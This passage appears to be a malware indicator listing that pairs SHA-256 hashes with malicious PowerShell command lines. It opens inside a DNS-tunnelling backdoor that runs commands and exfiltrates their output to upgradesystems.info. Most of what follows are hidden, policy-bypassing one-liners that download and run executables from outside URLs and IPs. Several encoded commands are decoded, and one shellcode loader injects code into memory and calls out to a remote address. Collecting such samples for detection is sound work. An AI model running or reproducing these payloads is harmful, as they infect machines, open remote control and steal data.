($cd.Substring(($cd.IndexOf('filename=')+9),($cd.Length-25))+'.bat.txt');Get-ChildItem "&HOME&"up\ | ForEach-Object {if((Get-Item ($_.FullName)).length -gt 0){[System.Convert]::ToBase64String(([System.IO.File]::ReadAllBytes($_.FullName))) | Out-File $_.FullName;$wc.UploadFile('"&SERVER&"upl&m=u',$_.FullName);waitfor haha /T 3};Remove-Item $_.FullName};Remove-Item ('"&HOME&"dn\'+$r+'.-_')}"""CreateObject("WScript.Shell").Run Replace(DownloadExecute,"-_","bat"),0DnsCmd="powershell -ExecutionPolicy Bypass -File "&HOME&"fireeye.ps1"CreateObject("WScript.Shell").Run DnsCmd,0 +++ $global:myhost = '.upgradesystems.info'$global:filename = ''$global:myflag = 0$global:myid = '###'$global:myhome = "$env:Public\Libraries\"function convertTo-Base36 ($decNum=""){    $decNum %= 46656    $alphabet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"    do    {        $remainder = ($decNum % 36)        $char = $alphabet.substring($remainder,1)        $base36Num = "$char$base36Num"        $decNum = ($decNum - $remainder) / 36    }    while ($decNum -gt 0)    $base36Num.PadLeft(3,'0')}function GetSub($myflag2, $cmdid='00', $partid='000'){    if($myflag2 -eq 0)    {    ('ww000000'+(convertTo-Base36(Get-Random -Maximum 46655)))    }    elseif($myflag2 -eq 1)    {        ('ww'+$global:myid+'00000'+(convertTo-Base36(Get-Random -Maximum 46655)))    }    elseif($myflag2 -eq 2)    {        ('ww'+$global:myid+$cmdid+$partid+(convertTo-Base36(Get-Random -Maximum 46655)))    }}function Str2Hex($mystr){    [System.BitConverter]::ToString([System.Text.Encoding]::Default.GetBytes($mystr)).Replace("-", "")}function Alive{    if($global:myid -eq '#'+'##')    {        return 0    }    SendReceiveDNS ((GetSub 1)+'30')    $sub = ((GetSub 1)+'232A') + (Str2Hex $global:filename)    $i = 1    $ret = 0    while($global:myflag -eq 1)    {        $ret = 1        $sub2 = $sub + (Str2Hex $i)        SendReceiveDNS $sub2        $i++    }    if($ret -eq 1)    {        FixBatFile ($global:myhome+'tp\'+$global:filename+".bat")    }    $ret}function SendReceiveDNS ($d){    $cnt = 0    while ($cnt -lt 20)    {        try        {            $mydata = ([System.Net.DNS]::GetHostByName($d+$global:myhost).AddressList[0])            $mydata = ($mydata | ForEach-Object {$_.IPAddressToString})            $cnt = 25        }        catch        {            Start-Sleep -m 500            $cnt++        }    }    if(-not($cnt -eq 25))    {        ('#'+'##')    }    elseif($global:myflag -eq 0 -and $mydata.StartsWith('33.33.'))    {        $tmp = $mydata.SubString(6).Split('.')        $global:filename = ([char] [int] $tmp[0]) + ([char] [int] $tmp[1])        $global:myflag = 1    }    elseif ($mydata.Equals('35.35.35.35'))    {        $global:myflag = 0    }    elseif ($global:myflag -eq 1)    {        $tmp = $mydata.Split('.')        [System.IO.File]::AppendAllText($global:myhome+'tp\'+$global:filename+".bat", (([char] [int] $tmp[0]) + ([char] [int] $tmp[1]) + ([char] [int] $tmp[2]) + ([char] [int] $tmp[3])))    }    elseif($global:myid -eq '#'+'##')    {        ([char] [int] $mydata.Split('.')[0])    }}function FixBatFile ($batpath){    (Get-Content $batpath).Substring(10) | Set-Content $batpath}function SendFile($myFilePath){    $myFileName = [System.IO.Path]::GetFileNameWithoutExtension($myFilePath)    $mystr = [System.IO.File]::ReadAllText($myFilePath)    $i=0    $mytemp = ''    $j=0    while($i -le $mystr.Length)    {        $mytemp += $mystr[$i]        if((($i%24) -eq 23) -or ($i -eq $mystr.Length))        {            $myhex = Str2Hex $mytemp            SendReceiveDNS ((GetSub 2 $myFileName (convertTo-Base36 $j)) + $myhex)            $j++            $mytemp = ''        }        $i++    }}function GetID{    $global:myid = SendReceiveDNS ((GetSub 0)+'30')}function ChangeThisFile ($botid){    (Get-Content $env:Public\Libraries\fireeye.ps1) -replace ('#'+'##'),$botid | Set-Content $env:Public\Libraries\fireeye.ps1}function Init{    if($global:myid -eq ('#'+'##'))    {        md -Force ($global:myhome+'tp\')        GetID        ChangeThisFile $global:myid    }}function main{    Init    if(Alive -eq 1)    {        Invoke-Expression ($global:myhome+'tp\'+$global:filename+'.bat > '+$global:myhome+'tp\'+$global:filename+'.txt')        SendFile ($global:myhome+'tp\'+$global:filename+'.txt')        Remove-Item ($global:myhome+'tp\'+$global:filename+'.bat')        Remove-Item ($global:myhome+'tp\'+$global:filename+'.txt')    }}main
  9. f3856c7af3c9f84101f41a82e36fc81dfc18a8e9b424a3658b6ba7e3c99f54f2
  10. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (new-obJect systeM.net.webcLient).downLoadfiLe('""https://luanjoaquimyuri777.box.com/shared/static/gfyyk4758zen4be1owf3zr536dm644wg.jpg','C:\Users\User1\AppData\Local\Temp\HOSTNAME4-WIN81_User1_owoze.dLL');start-process rundLL32.exe C:\Users\User1\AppData\Local\Temp\HOSTNAME4-WIN81_User1_owoze.dLL,starter""
  11. 65fa6ebe6f112511db70a4c59a64999dcf9a528ed5154a4f5f9e557dd9612989
  12. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABSAGUAcwB0AHIAaQBjAHQAZQBkACAALQBjAG8AbQBtAGEAbgBkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADMANQAuADEAMwA4AC4AMgAyAC8AdABhAGsAZQAvAHQAaQB0AGEAdAB0AC4AZQB4AGUAJwAsAB0gJABlAG4AdgA6AFQARQBNAFAAXABsAGUAdgBlAGwAbABnAGYALgBlAHgAZQAdICkAOwBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAoAB0gJABlAG4AdgA6AFQARQBNAFAAXABsAGUAdgBlAGwAbABnAGYALgBlAHgAZQAdICkA   --> PowerShell -ExecutionPolicy Restricted -command (New-Object System.Net.WebClient).DownloadFile('http://185.35.138.22/take/titatt.exe', $env:TEMP\levellgf.exe );Invoke-Item ( $env:TEMP\levellgf.exe )
  13. c0bacc6ceda670f15d7588c969bd6d4b1736ecf2ffa6d00039d858690d84c90b
  14. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://brucetang.com/wp-content/plugins/libravatar-replace/systemdll.exe','mess.exe');(New-Object -com Shell.Application).ShellExecute('mess.exe');
  15. cf1ddf4f1aec9da25a54a935c820ac3ca32d3271c2cfe69132f9ae26d8a702f2
  16. ed19e06dea064f8808863ef4bb631681879bd6aae00e4606a2cb63c1f6a6c489
  17. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy ByPass -NoProfile -command (New-Object System.Net.WebClient).DownloadFile('http://ch.hotel-adelboden.ch/forums/en/forums.php','C:\Users\User1\AppData\Local\Temp\Bia3d.exE');Start 'C:\Users\User1\AppData\Local\Temp\Bia3d.exE';
  18. 9d25e03f67b942ea5a6144f846010641faf3df8d73b77ad46fabd474176057a2
  19. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -File "C:\Users\User1\AppData\Local\Temp\ps.ps1"
  20. 24a018dc82de576b1939c21078c5ece9bbe866a5ea549eb5916669232189e909
  21. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noexit -ExecutionPolicy bypass -noprofile -file C:\Users\User1\AppData\Local\Temp\adobeacd-update.ps1
  22. 84dbeb770a728c415340d4ed6b8fd9fd66ca706e312464f1b68edd9fdf0aa0db
  23. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noexit -noprofile -enc "JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACcAUwB0AG8AcAAnAA0ACgAkAHMAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABMAGkAYwBlAG4AcwBlAHMAKQAuACcAewAwADEAOAAzADgANgA4ADEAQwBBADUAOQA4ADgAMQBFAEEAfQAnAA0ACgAkAGwAPQAkAHMALgBMAGUAbgBnAHQAaAANAAoAJABjAD0AQAAiAA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAYQAsAHUAaQBuAHQAIABiACwASQBuAHQAUAB0AHIAIABjACwASQBuAHQAUAB0AHIAIABkACwAdQBpAG4AdAAgAGUALABJAG4AdABQAHQAcgAgAGYAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAFYAaQByAHQAdQBhAGwARgByAGUAZQAoAEkAbgB0AFAAdAByACAAYQAsACAAVQBJAG4AdAAzADIAIABiACwAIABVAEkAbgB0ADMAMgAgAGMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAYQAsAHUAaQBuAHQAIABiACwAdQBpAG4AdAAgAGMALAB1AGkAbgB0ACAAZAApADsADQAKACIAQAANAAoAJABhAD0AQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABjACAALQBOAGEAbQBlACAAJwBXAGkAbgAzADIAJwAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQANAAoAJABiAD0AJABhADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAkAGwALAAwAHgAMwAwADAAMAAsADAAeAA0ADAAKQANAAoAWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAQwBvAHAAeQAoACQAcwAsADAALAAkAGIALAAkAGwAKQANAAoAJABhADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABiACwAMAAsADAALAAwACkAfABPAHUAdAAtAE4AdQBsAGwA"
  24. 344f26f6e3f7aca482086a37666860a2bde7f86d212ed84c0af830481866c1b4
  25. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WiNdOwStyle HiddeN -ExecutionPolicy Bypass -noloGo -noprofile (New-Object System.Net.WebClient).DownloadFile('HTTp://labravax.top/f.php','C:\Users\User1\AppData\Local\Temp\updater.ps1');
  26. fd0c23b388b6b55ea936e47cddc286354201ddbd6b81bcb3d68a2d73c1a6bdd2
  27. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -nop -w hidden -c "Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope Process; do{ IEX ((new-object net.webclient).downloadstring('https://www.payu.news/j/e8c07f0c/')); Start-Sleep -s 1800;}while(1);" -->  +++ $c = @"[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);"@$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru$x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x6e,0x65,0x74,0x00,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xe8,0x80,0x00,0x00,0x00,0x4d,0x6f,0x7a,0x69,0x6c,0x6c,0x61,0x2f,0x35,0x2e,0x30,0x20,0x28,0x63,0x6f,0x6d,0x70,0x61,0x74,0x69,0x62,0x6c,0x65,0x3b,0x20,0x4d,0x53,0x49,0x45,0x20,0x39,0x2e,0x30,0x3b,0x20,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x4e,0x54,0x20,0x36,0x2e,0x31,0x3b,0x20,0x57,0x4f,0x57,0x36,0x34,0x3b,0x20,0x54,0x72,0x69,0x64,0x65,0x6e,0x74,0x2f,0x35,0x2e,0x30,0x3b,0x20,0x4e,0x50,0x30,0x36,0x29,0x00,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x58,0x00,0x59,0x31,0xff,0x57,0x57,0x57,0x57,0x51,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0xeb,0x79,0x5b,0x31,0xc9,0x51,0x51,0x6a,0x03,0x51,0x51,0x68,0x50,0x00,0x00,0x00,0x53,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0xeb,0x62,0x59,0x31,0xd2,0x52,0x68,0x00,0x02,0x60,0x84,0x52,0x52,0x52,0x51,0x52,0x50,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x89,0xc6,0x31,0xff,0x57,0x57,0x57,0x57,0x56,0x68,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x74,0x44,0x31,0xff,0x85,0xf6,0x74,0x04,0x89,0xf9,0xeb,0x09,0x68,0xaa,0xc5,0xe2,0x5d,0xff,0xd5,0x89,0xc1,0x68,0x45,0x21,0x5e,0x31,0xff,0xd5,0x31,0xff,0x57,0x6a,0x07,0x51,0x56,0x50,0x68,0xb7,0x57,0xe0,0x0b,0xff,0xd5,0xbf,0x00,0x2f,0x00,0x00,0x39,0xc7,0x74,0xbc,0x31,0xff,0xeb,0x15,0xeb,0x49,0xe8,0x99,0xff,0xff,0xff,0x2f,0x57,0x5a,0x76,0x70,0x00,0x00,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x68,0x00,0x00,0x40,0x00,0x57,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68,0x00,0x20,0x00,0x00,0x53,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcd,0x8b,0x07,0x01,0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3,0xe8,0x37,0xff,0xff,0xff,0x32,0x31,0x33,0x2e,0x31,0x36,0x33,0x2e,0x37,0x33,0x2e,0x33,0x34,0x00;for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;}$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000
  28. 7aebf07dac69a432c1aa6dfe5312aab4aeb37e269d6da8131b2c74b1c805b0c2
  29. PoWerSHElL  (nEW-oBjEcT sYsTeM.neT.wEBcLiEnT).dOWNLOadfIlE('http://app2.dopplerfiles.net/201502/setspns.exe','C:\Users\User1\AppData\Roaming\putty.exe');
  30. 1fa080977c33786ec4526ddd02e11c0bd2ffb119c630fee7870d9e85b3208d13
  31. PoWerSHElL  (nEW-oBjEcT sYsTeM.neT.wEBcLiEnT).dOWNLOadfIlE('http://crystalbrighlplastic.com/tt/Quotationn.exe','C:\Users\User1\AppData\Local\Temp\Win rar.exe');
  32. 24c5d644c56ff03b26d44cdf21ca07ec05b1b315ebcab02c5fde3db746483bee
  33. powershell  add-appxpackage \\winbuilds\release\RS_EDGE_APP_EAL\14877.1008.160711-1000\x86fre\bin\FPA\PdfReader\PdfReader.appx
  34. 4869d5c6a4222201677d18e3535ca5ee64691e86011f3ff4e340fd572ab9fdcc
  35. powershell  -Command "(New-Object Net.WebClient).DownloadFile('http://rebrand.ly/comwe3d9a', 'C:\Users\User1\AppData\Local/Bigtoloop/12U80OB6DF3H3U3AXDRB.zip')"
  36. da53176f68c2121b53b42a600af0913e29024dc5998502c173906096f6478860
  37. powershell  -ExecutionPolicy ByPass -NoProfile -command (New-Object System.Net.WebClient).DownloadFile('http://redirect.immotinguely.ch/customer/Auth/CloudOffice.php','C:\Users\User1\AppData\Local\Temp\bBJjqwe3.exE');Start 'C:\Users\User1\AppData\Local\Temp\bBJjqwe3.exE';
  38. 77f9a8f6b01b8bf75409a53d2ec360aacd5bc00e80aba532765aa1821b2496cf
  39. poWershell  -ExecutionPolicy ByPass -NoProfile -command (New-Object System.Net.WebClient).DownloadFile('http://sol.sol-airconcept-vs.ch/13ub4ryi5jn/b43/97h3uine.php','C:\Users\User1\AppData\Local\Temp\ghHJVsa3d.exE');Start 'C:\Users\User1\AppData\Local\Temp\ghHJVsa3d.exE';
  40. 1a6859d265b94a2109d690999f62fdbadd8cb1894205e2e1b260a9f3bdcd8639
  41. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden $wc = New-Object System.Net.WebClient; $wc.Headers.Add('User-Agent','Windows-Media-Player/11.0.5721.5145');$wc.DownloadFile('http://www.scuoladanzamaja.it/cgi/logs.php','C:\Users\User1\AppData\Local\Temp.exe')
  42. 0f474aa06bcacc1abfaa96032c811574236228c9282bf3f0eab1209fcc100f52
  43. 252ba8bb668cea38c591dcced0e72d1cd32c7f23a1457cea7e8fce2583b9eacf
  44. 63a10b5464cc3bf26499dc040f9e87d32e24d7bce5138b987cd64325e4eb6d2f
  45. 7a6b8d6ec833fccf4836c6ce5b75a9df5b3b12a697cd92ca1b9916c677683bc3
  46. 94023c7884a5fe3fdf05df1123a97c8927b7dd99c286fe809d536770f79931e8
  47. 95547cec97467513fd66cf8c8356f3c89c407308906c749affdf108a8cec61dc
  48. c4bd2bdd27483adf83e0fbc26e8a037b5991edb516051659cead5c01171c9b23
  49. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden $wc = New-Object System.Net.Webclient;$wc.Headers.Add('User-Agent','Windows-Media-Player/11.0.5721.5145');$wc.DownloadFile('http://djprestige.net/111000/logs/logs.php','C:\Users\User1\AppData\Local\Temp.exe')
  50. ac68d03caf70d7532faee1753311a03e89280e03c932cd21d54a029b80fcf1ac
  51. d0c5b593c8984eae8162b7009e87b3a0312729f7bc258831e4c30a75cc397a1d
  52. ec461149c060115256ec6dfc34f898e965f2c60e1809b2d52380c85e1c839780
  53. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden $wc = New-Object System.Net.Webclient;$wc.Headers.Add('User-Agent','Windows-Media-Player/11.0.5721.5145');$wc.DownloadFile('http://justins-gift.com/public/php/logs.php','C:\Users\User1\AppData\Local\Temp.exe')
  54. 564a229d224bc59f96369a11ebf6b8c0647e18f910de0c52dba9c18778be6a0e
  55. 5b7fd91d4899b9f5e8d784b187e7795901da519e772975b73490c9acb2ed48ad
  56. a9af835e6f09747f0aaf18904ad19b710a817bd4eef7e78bbd4dd585d8adfb9d
  57. cf3f43bce8106b5d327d4cd68e7c172b6726d4a6ae1f4ff61d310bab923a4406
  58. dbb8a06de8490ea795e11ad90ada1edf096489396aea204dfe1bab48154d7d65
  59. e58c6677f496877175e3388108d5f3b75ac4caa45a1ed35de339b90d516a5465
  60. poWeRShELl  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile('http://16industries.com/cgi/logs.php','C:\Users\User1\AppData\Local\Temp\logs.php');
  61. a68c57f585f3842bfc6a37841c35057c2e7c5284611ea7df86acb3d17f8181bb
  62. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://23.95.242.119/word.exe','C:\Users\User1\AppData\Roaming\DFSHJhdxzwdfsn.exe');
  63. f486d061afb7775013367fd1cdba84366e35028613a72ff85a8f908ac2591b63
  64. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://45.33.59.129/setup.exe','C:\Users\User1\AppData\Local\Temp\Server.exe');
  65. 6c98d4f2b62b4db730884f9bd6d27e5360693eaad02d9cdbaa0e71c4c747450b
  66. POwershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://cl.ly/1o3p0U1E0222/download/office.office','C:\Users\User1\AppData\Roaming\MU.exe');
  67. 7222af9fe9f93f31e46e6878f8c5b4ea875bbb796cea760c9483ff5a2ae232f4
  68. PowerShell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://gmjblog.com/andac.exe','C:\Users\User1\AppData\Local\Example.exe');Start-Process 'C:\Users\User1\AppData\Local\Example.exe'
  69. 7626a3c23d043a02188d5cf0fed2a9574eee809f1fefccf158e2ee35bfe47c61
  70. e68564db1b0c488eaf4432163d16c95e9b7ec8033484698a0ffa8905ea091581
  71. e79cb44885371b8c8f628916828e0b40d089091f1a77ddab391fc71231b57319
  72. PowerShell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://gmjblog.com/andac.exe','C:\Users\User1\AppData\Roaming\Base64Lineandexecution2.EXE');Start-Process 'C:\Users\User1\AppData\Roaming\Base64Lineandexecution2.EXE'
  73. aa9c28b011c8ad40f1b6aedb8192681b0332a8a16b22abb6913f71aa4c8f3468
  74. PowerShell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://hllcanbodia.com/80/1.exe','C:\Users\User1\AppData\Roaming\testtttt.exe');Start-Process 'C:\Users\User1\AppData\Roaming\testtttt.exe'
  75. e8c76ecec2cdb4a90ad310bede1289cc48a506df6f55483deb157bd0833ce439
  76. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://taxloker.top/update.exe','C:\Users\User1\AppData\Local\Temp\update.exe');
  77. 12197569c24a764a955ddedcc0332de2eac40e05aa2c9b9a7b53d74e19c0684a
  78. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://www.scuoladanzamaja.it/cgi/logs.php','C:\Users\User1\AppData\Local\Temp.exe')
  79. 115cdc939d0b8b4f90a2845f63b0d1b836acd425fc9bf09bcf9c72b762018e52
  80. 218066c354309d65cdc9da773e040bd4786efe38c7f66c31526be0fc5ceed2c4
  81. 24dfd6098bbebf923f3a0716d04fe27da264295fc6a2981d4fb9f4bf107b9745
  82. 45661e844c0df14d2f683e21c242193cbd14b1726f623db6d91b471fd24fd0d3
  83. 8e0541f397d4b17a86b1a023b9d462406d64d81c7370f6bdcec7b5756afeb950
  84. 8f3bf4c85cd7894e4d0870063eed8233c6a0107c474fac0fc4c21440cbdd9c83
  85. 9e8c3f289724899b789a6b29cfe168a59e9b1a1da0ed80696d3942ca139dce8c
  86. a7354db582ea195bcf89ec18e772458293b0f86c2a150a7ca07c044d56150dfc
  87. f7897f6e9443373da8df02d7ddb142f5a4ca97f412f023919ecdca5914955bd1
  88. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/ccnxkl.exe','C:\Users\User1\AppData\Roaming\ZNDRTwyhhabeerty.exe');
  89. 30e2bb73007f564783b0917122405de4e4934be0faf463d19c41e378eeb5e62e
  90. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/dgvpsw.exe','C:\Users\User1\AppData\Roaming\Shurrqexxaf.exe');
  91. 57b4833def9353901b421bc39f49c9874e2b77c403f31ca3cfc6c9a3bda17141
  92. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/judmkl.exe','C:\Users\User1\AppData\Roaming\SSDFgbbvahhajjauy.exe');
  93. 35c90b61e8b16e551b9e79ecceb5ea644e09af1f2271cc39f669a04c08b3c458
  94. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/lontdo.exe','C:\Users\User1\AppData\Roaming\LVyHHDEWQAcGBTy.exe');
  95. 359aa2f14a3df85fa68d78f37cddc00509d335311b2bc2a4260578911c814124
  96. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/nvniel.exe','C:\Users\User1\AppData\Roaming\DFSHJhdxzwdfsn.exe');
  97. c66cbe1564589712a597610a3569f6d1b70226ce12ccf3b5d22d9aeb245d25bb
  98. PowerShell -Exec Bypass -NoL -Win Hidden -EncodedCommand JABNAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAkAE0ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABNAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsASQBFAFgAIAAkAE0ALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMwA3AC4AMgA4AC4AMQA1ADQALgAyADAANAAvAHAAbwB3AGUAcgBzAGgAZQBsAGwAXwBhAHQAdABhAGMAawAuAHQAeAB0ACcAKQA7AA== --> $M=new-object net.webclient;$M.proxy=[Net.WebRequest]::GetSystemWebProxy();$M.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $M.downloadstring('http://37.28.154.204/powershell_attack.txt');
  99. 4e07b3f3740920c2bbf62437dcd09b7178dd9ed78970601be39dc0123eebc8e1
  100. PowerShell -Exec Bypass -NoL -Win Hidden -EncodedCommand JABNAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAkAE0ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABNAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsASQBFAFgAIAAkAE0ALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMwA3AC4AMgA4AC4AMQA1ADUALgAyADIALwAyAC4AdAB4AHQAJwApADsA --> $M=new-object net.webclient;$M.proxy=[Net.WebRequest]::GetSystemWebProxy();$M.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $M.downloadstring('http://37.28.155.22/2.txt');
